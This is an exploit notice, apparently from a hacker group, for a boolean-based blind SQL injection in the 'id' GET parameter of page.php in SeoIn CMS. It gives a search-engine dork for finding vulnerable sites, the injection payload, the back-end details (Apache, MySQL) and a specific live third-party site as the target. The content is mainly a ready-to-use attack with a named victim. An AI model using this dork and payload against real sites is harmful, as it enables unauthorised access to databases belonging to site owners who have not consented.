[+] Exploit Title ; SeoIn cms sql injection vulnerability
[+] Date : 2018-01-16
[+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://seoin.ir
[+] Version : ...
[+] Dork : intext:"طراحی شده توسط سئو این" inurl:id=
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] SeoIn Is a personal content management
[+] Poc :
[+] Security Level :
[!] High
[+] Exploitation Technique:
[!] Remote
[+] web application technology: Apache
[+] back-end DBMS: MySQL >= 5.0.12
[+] Vulnerability Files :
[*] page.php
[+] Parameter: id (GET)
[!] Type: boolean-based blind
[!] Title: AND boolean-based blind - WHERE or HAVING clause
[!] Payload: id=1 AND 7623=7623
[+] Target :
[!] http://kkhr.ir/page.php?id=1
[+] We Are : Mehrdad_ice [+] 0P3N3R [+]